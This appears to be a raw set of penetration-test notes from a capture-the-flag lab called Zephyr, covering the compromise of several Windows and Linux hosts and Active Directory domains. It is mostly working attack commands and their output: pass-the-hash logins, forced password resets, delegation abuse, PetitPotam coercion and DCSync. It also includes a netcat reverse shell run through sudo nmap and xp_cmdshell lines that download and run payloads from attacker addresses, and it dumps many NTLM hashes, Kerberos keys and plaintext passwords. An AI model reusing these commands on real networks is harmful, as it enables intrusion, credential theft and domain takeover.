192.168.110.53
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8af1903d3c80d3552a84b6ba296db2ea james@192.168.110.53
C:\Users\Administrator\Desktop>type flag.txt
ZEPHYR{P3r5isT4nc3_1s_k3Y_4_M0v3men7} :persistance
cme smb 192.168.110.53 -u James -H 8af1903d3c80d3552a84b6ba296db2ea --local-auth --put-file WESTERN_DRUM.exe WESTERN_DRUM.exe
Import-Module .\powerview.ps1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity blake -AccountPassword $UserPassword -Verbose
getST.py -spn 'cifs/dc.painters.htb' -impersonate 'Administrator' -dc-ip 192.168.110.55 -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'painters.htb/blake'
export KRB5CCNAME=Administrator.ccache
wmiexec.py 'painters.htb/Administrator@dc.painters.htb' -no-pass -k
secretsdump.py -k dc.painters.htb
evil-winrm -i 192.168.110.55 -u Administrator -H 5bdd6a33efe43f0dc7e3b2435579aa53
evil-winrm -i 192.168.110.54 -u blake -p Password123!
.51
sudo su(.51)
Matt: L1f30f4Spr1ngCh1ck3n!
matt@mail:~$ sudo su
root@mail:/home/matt# ls
root@mail:/home/matt# cd /root
root@mail:~# ls
flag.txt scripts
root@mail:~# cat flag.txt
ZEPHYR{L34v3_N0_St0n3_Un7urN3d} :Back Tracking
root@mail:~#
.55
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b59ffc1f7fcd615577dab8436d3988fc:::
riley:1106:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
blake:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
gavin:1108:aad3b435b51404eeaad3b435b51404ee:cb8ec920398da9fbb7c33b7b613b28d5:::
daniel:1109:aad3b435b51404eeaad3b435b51404ee:b084c663ad3f214e516e6f89c81c80d7:::
tom:1110:aad3b435b51404eeaad3b435b51404ee:dc51a409ab6cf835cbb9e471f27d8bc6:::
web_svc:1111:aad3b435b51404eeaad3b435b51404ee:502472f625746727fa99566032383067:::
painters.htb\Matt:4101:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5869ab656006ee71af41d437a6788093:::
PNT-SVRSVC$:1103:aad3b435b51404eeaad3b435b51404ee:c206d294c947cecc0e60955004ff96c5:::
PNT-SVRBPA$:1104:aad3b435b51404eeaad3b435b51404ee:2dfcebbe9f5f4cb3bf98032887b3d7b6:::
PNT-SVRPSB$:1105:aad3b435b51404eeaad3b435b51404ee:7fc6b6b4b44a96617b5829a888b5a85a:::
MAINTENANCE$:2101:aad3b435b51404eeaad3b435b51404ee:fa8cde2a742ad8f6eb16e3d4bd5ed80b:::
WORKSTATION-1$:2103:aad3b435b51404eeaad3b435b51404ee:9ab46ef513f6f74ddf1ab492b8f542fa:::
ZSM$:2102:aad3b435b51404eeaad3b435b51404ee:eb6049eb57ae1ac50844b2ab2c73114e:::
painters.htb\Matt:CLEARTEXT:L1f30f4Spr1ngCh1ck3n!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
ZEPHYR{P41n73r_D0m41n_D0m1n4nc3} :Domination
Pingable and reachable cme host from 110.55
192.168.210.10: True
192.168.210.11: True
192.168.210.12: True
192.168.210.14: True
192.168.210.15: True
192.168.210.16: True
.52
**psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:502472f625746727fa99566032383067 web_svc@192.168.110.52**
ZEPHYR{S3rV1c3_AcC0Un7_5PN_Tr0uBl35} :Disclousure
.56
evil-winrm -i 192.168.110.56 -u riley -p P@ssw0rd
ZEPHYR{PwN1nG_W17h_P4s5W0rd_R3U53} : recycled
Ping Swep
192.168.210.10: True
192.168.210.12: True
192.168.210.13: True
192.168.210.16: True
└─$ cme smb 192.168.210.10-20
SMB 192.168.210.10 445 ZPH-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB 192.168.210.11 445 ZPH-SVRMGMT1 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRMGMT1) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB 192.168.210.12 445 ZPH-SVRCA01 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCA01) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB 192.168.210.15 445 ZPH-SVRSQL01 [*] Windows 10.0 Build 17763 x64 (name:ZPH-SVRSQL01) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB 192.168.210.16 445 ZPH-SVRCDC01 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB 192.168.210.14 445 ZPH-SVRADFS1 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRADFS1) (domain:zsm.local) (signing:False) (SMBv1:False)
.54
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
through blake
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
ZEPHYR{7h3_Tru57_h45_B3eN_Br0k3n} :Heartbreak
210.13
go run poc.go check -t https://192.168.210.13:443 -u Admin
[INFO] 2023/09/18 14:12 vul exist! target: https://192.168.210.13:443, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiODc1OWFjZDhhZmExZDdkN2FlNmM0ZGY5MmE1NzgwZTAiLCJzaWduIjoidEQ3WjBTMkd5NHNjTmVuTWJ3QmVWdkZwVXRDc25JVmlQZ3FuZG9SN1BVQkY2aldabVJ1eTJwUitBRkI4SnFub0ltV1NrMEx4WTVoZHBXQlpkbDZacWc9PSJ9
Copy the value in the cokkie session of SSO which will give u a dashboard
TF=$(mktemp) && echo 'os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 53 >/tmp/f")' >$TF && sudo nmap --script=$TF
nc -lvnp 53
/root/desktop
cat flag.txt
ZEPHYR{Abu51ng_d3f4ul7_Func710n4li7y_ftw} : Monitored
? (192.168.210.16) at 00:50:56:b9:58:7d [ether] on eth0
? (192.168.210.14) at 00:50:56:b9:11:b9 [ether] on eth0
? (192.168.210.10) at 00:50:56:b9:b9:4a [ether] on eth0
? (192.168.210.17) at 00:50:56:b9:79:b4 [ether] on eth0
? (192.168.210.15) at 00:50:56:b9:bc:fb [ether] on eth0
? (192.168.210.12) at 00:50:56:b9:b1:e1 [ether] on eth0
? (192.168.210.11) at 00:50:56:b9:1c:3e [ether] on eth0
? (192.168.210.18) at 00:50:56:b9:ae:dd [ether] on eth0
user = debian-sys-maint
password = cK8y5D1ydIXX3VCI
root:$6$6f6giSmZBJf/.sxX$lxLJK6FwdiiKgWo593xCjV0yi2U29AU5d2v2tYLrnN8AoBKswgvSuQwKiUhSb3nEcDa4sbMTu2N/TRd304bgg0:19334:0:99999:7:::
find / -name zabbix* 2>/dev/null
cat /usr/local/etc/zabbix_server.conf
DBName=zabbix
### Option: DBSchema # Schema name. Used for PostgreSQL. # # Mandatory: no # Default: # DBSchema= ### Option: DBUser # Database user. # # Mandatory: no # Default: # DBUser=
DBUser=zabbix ### Option: DBPassword # Database password. # Comment this line if no password is used. # # Mandatory: no # Default:
DBPassword=rDhHbBEfh35sMbkY
$2y$10$dHMYveVV/xZoM5sc9cPHGe4xUukdyOM91C.LJ8TrpRQA3s1eXhm4.
└─$ hashcat -m 3200 marcus_hash --show
$2y$10$dHMYveVV/xZoM5sc9cPHGe4xUukdyOM91C.LJ8TrpRQA3s1eXhm4.:!QAZ2wsx
Enumeration
└─$ cme smb 192.168.210.18 -u 'zabbix' -p 'rDhHbBEfh35sMbkY' --shares
SMB 192.168.210.18 445 ZPH-SVRCSUP [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCSUP) (domain:internal.zsm.local) (signing:False) (SMBv1:False)
SMB 192.168.210.18 445 ZPH-SVRCSUP [+] internal.zsm.local\zabbix:rDhHbBEfh35sMbkY
SMB 192.168.210.18 445 ZPH-SVRCSUP [*] Enumerated shares
SMB 192.168.210.18 445 ZPH-SVRCSUP Share Permissions Remark
SMB 192.168.210.18 445 ZPH-SVRCSUP ----- ----------- ------
SMB 192.168.210.18 445 ZPH-SVRCSUP ADMIN$ Remote Admin
SMB 192.168.210.18 445 ZPH-SVRCSUP C$ Default share
SMB 192.168.210.18 445 ZPH-SVRCSUP IPC$ READ Remote IPC
SMB 192.168.210.18 445 ZPH-SVRCSUP loot READ,WRITE
SMB 192.168.210.18 445 ZPH-SVRCSUP PublicShare READ,WRITE 210.15 MSSQL login
impacket-mssqlclient zsm.local/zabbix:rDhHbBEfh35sMbkY@192.168.210.15
exec_as_login sa
SQL (sa dbo@zabbix_hosts)> xp_cmdshell whoami
output
----------------------
nt service\mssqlserver
port 53
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.9:443/large1.ps1") | powershell -noprofile'generate beacon --http 10.10.14.9 --os windows --save .
EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.9:53/WESTERN_DRUM.exe C:\Users\Public\Documents\WESTERN_DRUM.exe'
EXEC xp_cmdshell 'C:\Users\Public\Documents\WESTERN_DRUM.exe'
sliver (WESTERN_DRUM) > certify find /vulnerable
for new windows se impersonation
[https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0](https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0 "https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0
(https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0)")
sliver (WESTERN_DRUM) > hashdump
[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ac325190bb999ef4ad73b0b67e8e33c:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
* Username : ZPH-SVRSQL01$
* Domain : ZSM
* NTLM : ecf68b5e132ca80e6864215d5fcbba03
* SHA1 : bf1dfc13aaccdc957bb5246c19610667a88bfd60
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7ac325190bb999ef4ad73b0b67e8e33c Administrator@192.168.210.15
PS C:\Users\Administrator\Desktop> cat flag.txt
cat flag.txt
ZEPHYR{SQLi_2_Imp3rs0n4710n_fun} :The Statement
PS C:\Users\Administrator\Desktop> pwd
pwd
Path
----
C:\Users\Administrator\Desktop
cme smb 192.168.210.16 -u 'Administrator' -H 5bdd6a33efe43f0dc7e3b2435579aa53 -d painters.htb -M petitpotam
PETITPOT... 192.168.210.16 445 ZPH-SVRCDC01 VULNERABLE
PETITPOT... 192.168.210.16 445 ZPH-SVRCDC01 Next step: https://github.com/topotam/PetitPotam
Pingable host from .15
for i in {1..254};do (ping -c 1 192.168.210.$i | grep "bytes from" &);done
1..256 | % {"192.168.210.$($_): $(Test-Connection -count 1 -comp 192.168.210.$($_) -quiet)"}
192.168.210.10: True
192.168.210.12: True
192.168.210.13: True
192.168.210.15: True
192.168.210.16: True
192.168.210.19: True
changing password for jamie
Import-Module ./powerview.ps1
$SecPassword = ConvertTo-SecureString '!QAZ2wsx' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\marcus', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity jamie -AccountPassword $UserPassword -Credential $Cred -Verbose
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\jamie', $SecPassword)
Add-DomainGroupMember -Identity 'CA MANAGERS' -Members 'jamie' -Credential $Cred -Verbose
CA try Generic ALL of a Group on a SYStem
impacket-addcomputer -method SAMR -computer-pass 'Summer2018!' -computer-name attackersystem 'zsm.local/jamie:Password123!'
impacket-rbcd -delegate-from 'attackersystem' -delegate-to 'ZPH-SVRCA01$' -action 'write' 'zsm.local/jamie:Password123!'
$ComputerSid = Get-DomainComputer ATTACKERSYSTEM$ -Properties objectsid | Select -Expand objectsid
Get-ObjectAcl -DistinguishedName "CN=ZPH-SVRCA01,CN=Computers,DC=zsm,DC=local" -ResolveGUIDs | Where-Object { $_.IdentityReference -eq "zsm.local\CA Managers" -or $_.IdentityReference -eq "zsm.local\ca_svc" }
Get-DomainComputer ZPH-SVRCA01.zsm.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
210.11
└─$ certipy shadow auto -username marcus@zsm.local -p '!QAZ2wsx' -account ZPH-SVRMGMT1$ -dc-ip 192.168.210.10 -debug
pth-net rpc group addmem "General Management" "ca_svc" -U zsm.local/ZPH-SVRMGMT1\$%"ffffffffffffffffffffffffffffffff":"89d0b56874f61ad38bad336a77b8ef2f" -S 192.168.210.10
impacket-secretsdump 'zsm.local/jamie:Password123!@192.168.210.11'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90c9f7848607977407f9afabdb3cfcc0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:545c503123664e5713439e088bd91035:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a58eed2cff6a92dd8d2d5b9116be4f:::
Waka:1000:aad3b435b51404eeaad3b435b51404ee:540e425b08537ae30e53b5d4c123385e:::
[*] Dumping cached domain logon information (domain/username:hash)
ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6: (2023-05-19 08:27:18)
ZSM.LOCAL/marcus:$DCC2$10240#marcus#66dddfc25df0d824e30c55a9ecccb512: (2023-09-19 04:32:12)
ZSM.LOCAL/jamie:$DCC2$10240#jamie#8eaa1e87b84f7197df2b836fae8e5c3c: (2022-10-28 12:56:42)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ZSM\ZPH-SVRMGMT1$:aes256-cts-hmac-sha1-96:937391acdbd6a5f63cf0f6700ac25aba7c8d747bcdd437f5efb419a12d8995c7
ZSM\ZPH-SVRMGMT1$:aes128-cts-hmac-sha1-96:d73da5795d36d46bf61b1afb40b247f5
ZSM\ZPH-SVRMGMT1$:des-cbc-md5:46620bf237cb1568
ZSM\ZPH-SVRMGMT1$:plain_password_hex:a59ff2202125f08774455a23ac8e623130743053e98d29eea3234cf4995bc3040b3e86e68c4ce7d681da4614f3b4d6066ce96a1a0257a1dca1221f864fcaf05f617d53ff9e6e7e8afedf8e4e70dd793440a6203fc780bbae017e795f3002958340850257b1caff49bcb045a861c67631dfb7f0ac6525ec72a9fd35035bfa1cb79578a785c08140a10abe5b756c2bcaa06ae1dceb3fe0f315a793c66aeaf35558deafd3d3796674de82fb98ba41878356fdde5ab8fc89dfe8a67c34015d64f03f52d515684b07c1bc9108daa73c6a63f49bf32e6403f850ae7d56ca6f2c49ca82fe414f14c100a2fb7cc901a2f07c52dc
ZSM\ZPH-SVRMGMT1$:aad3b435b51404eeaad3b435b51404ee:89d0b56874f61ad38bad336a77b8ef2f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x05341d094f374bb97fd82b3a19619bbc3d28e967
dpapi_userkey:0xc4de07634653cdeda95b1baea5a86ceaa9683003
[*] NL$KM
0000 95 E8 38 F2 47 8A 41 12 A5 77 CA 0A 23 E6 56 28 ..8.G.A..w..#.V(
0010 85 56 73 10 A9 49 99 6A B5 5D FB C5 AD B4 4C 76 .Vs..I.j.]....Lv
0020 3A 07 D8 40 73 ED EE 03 28 5E A6 02 7E 09 38 EA :..@s...(^..~.8.
0030 48 55 7F 6D 9C FD 9A 8B C1 F1 F4 D7 0A 6F 3B D0 HU.m.........o;.
NL$KM:95e838f2478a4112a577ca0a23e6562885567310a949996ab55dfbc5adb44c763a07d84073edee03285ea6027e0938ea48557f6d9cfd9a8bc1f1f4d70a6f3bd0
[*] Cleaning up...
[*] Stopping service RemoteRegistry
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:545c503123664e5713439e088bd91035 Administrator@192.168.210.11
net group "General Management" marcus /add /domain
certutil -urlcache -split -f http://10.10.17.10:53/SENSIBLE_CODE.exe
PS C:\Users\Administrator\Desktop> type flag.txt
type flag.txt
ZEPHYR{K3y_Cr3d3n714l_l1nk_d4ng3r} :Diverted
[+] Host File(T1016)
192.168.210.17 zephyr.bamboohr.htb
192.168.210.18 zephyr.atlassian.htb
URL:
Login: melissa
Password: WinterIsHere2022!
# 210.16
python3 PetitPotam.py -u mssql_svc -p 'ToughPasswordToCrack123!' -d internal.zsm.local -dc-ip 192.168.210.16 10.10.17.66 192.168.210.16
[SMB] NTLMv2-SSP Client : 10.10.110.35
[SMB] NTLMv2-SSP Username : internal\ZPH-SVRCDC01$
[SMB] NTLMv2-SSP Hash : ZPH-SVRCDC01$::internal:d1c4901af08557de:8200E4599C9AEB7D5E34E4BAA800E1D1:01010000000000000053C1F939EBD901EBF9F918AAE7E40600000000020008005A0043004900480001001E00570049004E002D0055004A0046004100330054004800360041004500440004003400570049004E002D0055004A004600410033005400480036004100450044002E005A004300490048002E004C004F00430041004C00030014005A004300490048002E004C004F00430041004C00050014005A004300490048002E004C004F00430041004C00070008000053C1F939EBD9010600040002000000080030003000000000000000000000000040000093640A4F2CF1016AC550808CDD1CBE2AC82071074DD4AC2F71555AE06BB474790A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310037002E00360036000000000000000000bloodhound-pyhton
bloodhound-python -u jamie -p 'Password123!' -ns 192.168.210.10 -d zsm.local -c all --dns-tcp --zip
bloodhound-python -u melissa -p 'WinterIsHere2022!' -ns 192.168.210.16 -d zsm.local -c all --dns-tcp --zip
bloodhound-python -u matt -p 'L1f30f4Spr1ngCh1ck3n!' -ns 192.168.110.55 -d painters.htb -c all --dns-tcp --zip
210.16
cme smb 192.168.210.16 -u 'melissa' -p 'WinterIsHere2022!' --shares
smbclient.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16
└─$ reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' backup -o '\\10.10.14.4\exegol'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SAM to \\10.10.14.4\exegol\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.14.4\exegol\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.14.4\exegol\SECURITY.save
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' query -keyName 'HKLM\SAM' -o '\\10.10.14.4\share'
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.4\share'
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' save -keyName 'HKLM\SECURITY' -o '\\10.10.14.4\share'
Local secretsdump SAM
impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY LOCAL
*] Target system bootKey: 0xb1223a009047a376c120c3630a0f0e48
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948
[*] DPAPI_SYSTEM
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
[*] NL$KM
0000 07 E9 F2 3F 08 49 46 07 02 CE 30 4B 65 D3 86 32 ...?.IF...0Ke..2
0010 6F 02 5D 36 7D E8 30 33 F4 71 94 44 98 37 CB 1A o.]6}.03.q.D.7..
0020 05 CC 76 F1 26 E2 94 E7 D3 54 78 1F EF BE E9 13 ..v.&....Tx.....
0030 30 3B 62 CB A5 57 75 E6 78 F3 D4 55 5C 68 20 15 0;b..Wu.x..U\h .
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015
[*] Cleaning up...
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SAM' -o 'C:'
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o 'C:'
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SECURITY' -o 'C:'
smbclient.py -U melissa \\192.168.210.16\c$
get SAM.save
get SECURITY.save
get SYSTEM.save
finally, we can use impacket's secretdump to get the hashes
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
After some days struggling I come accross this article here it describes how to do a DCSync attack using the Domain Controler Machine account. It's the following:
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948 -just-dc internal.zsm.local/ZPH-SVRCDC01\$@192.168.210.16
└─$ secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948 -just-dc internal.zsm.local/ZPH-SVRCDC01\$@192.168.210.16
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::
internal.zsm.local\mssql_svc:6101:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Emily:6601:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Laura:6602:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Melissa:6603:aad3b435b51404eeaad3b435b51404ee:184260f5bf16a77d67a9d540fda79495:::
internal.zsm.local\Sarah:6604:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Amy:6605:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Steven:6606:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Malcolm:6607:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Aron:6608:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Matt:6609:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Jamie:6610:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
smith:17601:aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f:::
ZPH-SVRCDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
ZPH-SVRCHR$:1601:aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e:::
ZPH-SVRCSUP$:1602:aad3b435b51404eeaad3b435b51404ee:36e7d551e7cb15ca7dad3fd851fc707f:::
ZSM-SVRCSQL02$:5601:aad3b435b51404eeaad3b435b51404ee:ad854719bbb6fc1664316a14cc6eb88d:::
INT-MAINT$:6102:aad3b435b51404eeaad3b435b51404ee:8c0aff2e562402c147dc9650b1eb86cb:::
ZSM$:1103:aad3b435b51404eeaad3b435b51404ee:91d02ffbd6ca69bfb36bac9bd679bac1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ab4d5bbcb88a9344fbdfee0f8ad5825d043d41bd36743d95d0ec410b43b8f35d
Administrator:aes128-cts-hmac-sha1-96:7fe65b32357f19c0d5cf95675e789f00
Administrator:des-cbc-md5:6e3db9041a64803d
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16
internal.zsm.local\mssql_svc:aes256-cts-hmac-sha1-96:bea9de16d6775f6ed646cf8e002b2e6845e219f080a709410cb600f909d105ff
internal.zsm.local\mssql_svc:aes128-cts-hmac-sha1-96:4df91cf757b8cb7c5f6e544236293c8d
internal.zsm.local\mssql_svc:des-cbc-md5:5bdf199ee546e6f8
internal.zsm.local\Emily:aes256-cts-hmac-sha1-96:6fac0f47c747960e583ab9cb6d93c31a9425f9a921d246766c2d1a798e10fb56
internal.zsm.local\Emily:aes128-cts-hmac-sha1-96:fbba2f446451e35dd9cbf1d376580e1f
internal.zsm.local\Emily:des-cbc-md5:fd374cc262ec9201
internal.zsm.local\Laura:aes256-cts-hmac-sha1-96:bf6a8feea25df8f1640143c2dc26bc76128748962aef3d5e1c315b8bc7acc8c0
internal.zsm.local\Laura:aes128-cts-hmac-sha1-96:b994efccf32f7827c5ec3a43126a1118
internal.zsm.local\Laura:des-cbc-md5:add68cc23470b0f8
internal.zsm.local\Melissa:aes256-cts-hmac-sha1-96:b09d86e2e6480c2122ee1383f24e592a9642e16470a82bdeb9fff6875d41a922
internal.zsm.local\Melissa:aes128-cts-hmac-sha1-96:289e6d2c65f84c94f185e9755708cf3b
internal.zsm.local\Melissa:des-cbc-md5:982a25f7dc4cb3e9
internal.zsm.local\Sarah:aes256-cts-hmac-sha1-96:81028d54164a46107a6f6b9b0ac9a9216aee0e8d4bce82a3c668d5e1f16774c5
internal.zsm.local\Sarah:aes128-cts-hmac-sha1-96:d130b796b81c66348bc67a95029a19c7
internal.zsm.local\Sarah:des-cbc-md5:29ceaeb664bc2f9e
internal.zsm.local\Amy:aes256-cts-hmac-sha1-96:940adf4174eaaa50218561b87644cdf0210cdecb40ee5b6672312ef39e7f4390
internal.zsm.local\Amy:aes128-cts-hmac-sha1-96:655645f7b62f9d073a00ef7142c8da33
internal.zsm.local\Amy:des-cbc-md5:49e0d6bfd69868b6
internal.zsm.local\Steven:aes256-cts-hmac-sha1-96:9adcb602c37ce0ee4894d74a6575a6f70f7430e8e00446bc0850b787089c4cc4
internal.zsm.local\Steven:aes128-cts-hmac-sha1-96:e9731b435a8651cf11d52d71df936385
internal.zsm.local\Steven:des-cbc-md5:5dce8a52b389e5a2
internal.zsm.local\Malcolm:aes256-cts-hmac-sha1-96:f6e7d8a35afb386c1c271d6a53af85fcf8e306d36f281fdfc2c477c353f62c91
internal.zsm.local\Malcolm:aes128-cts-hmac-sha1-96:4bac2835d8be32ad5dd585ceb7450ef3
internal.zsm.local\Malcolm:des-cbc-md5:26b331256d2fbcd9
